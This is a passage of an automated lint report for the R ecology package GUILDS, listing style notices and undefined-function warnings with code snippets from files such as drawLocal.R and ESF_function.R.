xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                        ~^~~\n```\n[R/drawLocal.R:41:62:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] <- integrate(f, xlft, xrgt, abs.tol = 1e-9)$val  #checked!!!!!1\n                                                            ~^~\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n^\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n            ~^~~\n```\n[R/drawLocal.R:47:35:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                 ~^~\n```\n[R/drawLocal.R:47:39:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L47) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tkesk <- pracma::interp1(x = log2(k1), \n                                      ^\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        y = k1 * res, \n^\n```\n[R/drawLocal.R:48:35:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        y = k1 * res, \n                                  ^~\n```\n[R/drawLocal.R:48:39:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L48) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        y = k1 * res, \n                                      ^\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        xi = log2(k2), \n^\n```\n[R/drawLocal.R:49:36:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        xi = log2(k2), \n                                  ~^~\n```\n[R/drawLocal.R:49:40:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t                        xi = log2(k2), \n                                       ^\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        method = \"spline\")\n^\n```\n[R/drawLocal.R:50:40:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        method = \"spline\")\n                                      ~^~\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:52:14:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L52) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:53:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:53:13:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L53) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:54:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n^\n```\n[R/drawLocal.R:54:17:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n               ~^~\n```\n[R/drawLocal.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < pracma::eps()] <- pracma::eps()\n                                ~^~~\n```\n[R/drawLocal.R:55:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L55) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:61:5:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L61) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(length(idx0) > 0) {\n    ^\n```\n[R/drawLocal.R:62:42:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L62) *style:* **Put spaces around all infix operators.**\n```r\n​    aux <- log(th) + lgamma(I) - lgamma(I+j) +\n                                        ~^~\n```\n[R/drawLocal.R:69:9:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n        ^\n```\n[R/drawLocal.R:69:11:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n         ~^~\n```\n[R/drawLocal.R:69:14:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n            ~^~~\n```\n[R/drawLocal.R:69:16:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n               ^\n```\n[R/drawLocal.R:69:17:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L69) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if ((k<j)||((k == j) && (th > 1))) {\n                ^\n```\n[R/drawLocal.R:71:27:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                          ^\n```\n[R/drawLocal.R:71:28:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L71) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                           ^\n```\n[R/drawLocal.R:71:31:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:71:37:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n                                    ^~~\n```\n[R/drawLocal.R:73:27:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                          ^\n```\n[R/drawLocal.R:73:28:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L73) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                           ^\n```\n[R/drawLocal.R:73:31:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                             ~^~~\n```\n[R/drawLocal.R:73:37:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L73) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n                                   ~^~~\n```\n[R/drawLocal.R:77:17:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L77) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  idxp <- which((x > 0) & (x < 1))\n                ^\n```\n[R/drawLocal.R:79:29:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​  aux <- log(th) + lgamma(I)-lgamma(I + j) +\n                           ~^~\n```\n[R/drawLocal.R:83:13:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​         (th-1) * log(1 - xx) - log(xx)\n           ~^~\n```\n[R/drawLocal.R:90:9:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L90) *warning:* **no visible global function definition for ‘getpx’, Did you mean 'get'?**\n```r\n​  nx <- getpx(theta, alpha_x, alpha_y, JX, JY)\n        ^~~~~\n```\n[R/drawLocal.R:94:27:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L94) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:95:27:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L95) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/drawLocal.R:97:11:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L97) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, JX)\n          ^~~~~~\n```\n[R/drawLocal.R:98:11:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L98) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, JY)\n          ^~~~~~\n```\n[R/drawLocal.R:110:68:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L110) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J - 1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                   ^\n```\n[R/drawLocal.R:112:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/drawLocal.R:117:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L117) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/drawLocal.R:119:3:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/drawLocal.R:121:12:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L121) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​  probs <- polyaeggenberger(I_X, I_Y, J, allN)\n           ^~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:121:42:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L121) *style:* **Variable and function names should be all lowercase.**\n```r\n​  probs <- polyaeggenberger(I_X, I_Y, J, allN)\n                                         ^~~~\n```\n[R/drawLocal.R:126:11:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L126) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sadx <- pm_sad(theta, I_X, NX)\n          ^~~~~~\n```\n[R/drawLocal.R:127:11:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/drawLocal.R#L127) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  sady <- pm_sad(theta, I_Y, NY)\n          ^~~~~~\n```\n[R/ESF_function.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.ESF <- function(theta, m, abund) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:10:14:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​  I <- m * (J-1) / (1 - m)\n            ~^~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L12) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:12:10:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L12) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:14:13:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L14) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:19:22:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L19) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  prefactor1 <- -1 * ( sum(log(abund)) + sum(lgamma(1 + freq_x)))\n                     ^\n```\n[R/ESF_function.R:22:22:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​  factor1 <- lgamma(J+1) + prefactor1\n                    ~^~\n```\n[R/ESF_function.R:24:15:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​  factor2 <- S*log(theta)   -  (lgamma(I + J) - lgamma(I))\n             ~^~\n```\n[R/ESF_function.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n^\n```\n[R/ESF_function.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\treturn(out)\n^~\n```\n[R/ESF_function.R:44:13:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L44) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  sumkda <- calc_sum_kda(S, J, I, theta, kda)\n            ^~~~~~~~~~~~\n```\n[R/ESF_function.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L52) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.ESF <- function(init_vals, abund, verbose=TRUE) {\n^~~~~~~~~~~~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L70) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:70:10:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L70) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda <- calcKDA(abund)  #confirmed in PARI\n         ^~~~~~~\n```\n[R/ESF_function.R:76:24:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​  prefactor <- lgamma(J+1) - ( sum(log(abund)) + sum(lgamma(1 + freq_x)) )\n                      ~^~\n```\n[R/ESF_function.R:79:15:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n             ~^~~\n```\n[R/ESF_function.R:79:16:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L79) *warning:* **no visible global function definition for ‘esf_local’**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n               ^~~~~~~~~\n```\n[R/ESF_function.R:79:21:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t  out <- -1 * esf_local(x, abund, prefactor, kda)\n                   ~^~\n```\n[R/ESF_function.R:83:14:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/ESF_function.R#L83) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​  optimum <- simplex(init_vals, g, verbose)\n             ^~~~~~~\n```\n[R/evaluateLogLik2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/evaluateLogLik2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateLogLik <- function(v, theta_x, theta_y, alpha_x, alpha_y,\n^~~~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:17:8:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/evaluateLogLik2.R#L17) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n       ^\n```\n[R/evaluateLogLik2.R:17:42:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/evaluateLogLik2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                         ^\n```\n[R/evaluateLogLik2.R:19:8:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/evaluateLogLik2.R#L19) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  s <- calc_sum_kda(Sx, Nx, I_X, (theta_x / 2), KDA_X)\n       ^~~~~~~~~~~~\n```\n[R/evaluateLogLik2.R:20:8:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/evaluateLogLik2.R#L20) *warning:* **no visible global function definition for ‘calc_sum_kda’**\n```r\n​  z <- calc_sum_kda(Sy, Ny, I_Y, (theta_y / 2), KDA_Y)\n       ^~~~~~~~~~~~\n```\n[R/expected.R:2:19:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L2) *style:* **Commas should always have a space after.**\n```r\n​  output <- rep(0,13)\n                  ^\n```\n[R/expected.R:5:15:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    start <- 2^(k - 1)\n             ~^~\n```\n[R/expected.R:5:16:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    start <- 2^(k - 1)\n               ^\n```\n[R/expected.R:6:18:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​    end <- -1 + 2^(k)\n                ~^~\n```\n[R/expected.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    end <- -1 + 2^(k)\n                  ^\n```\n[R/expected.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, 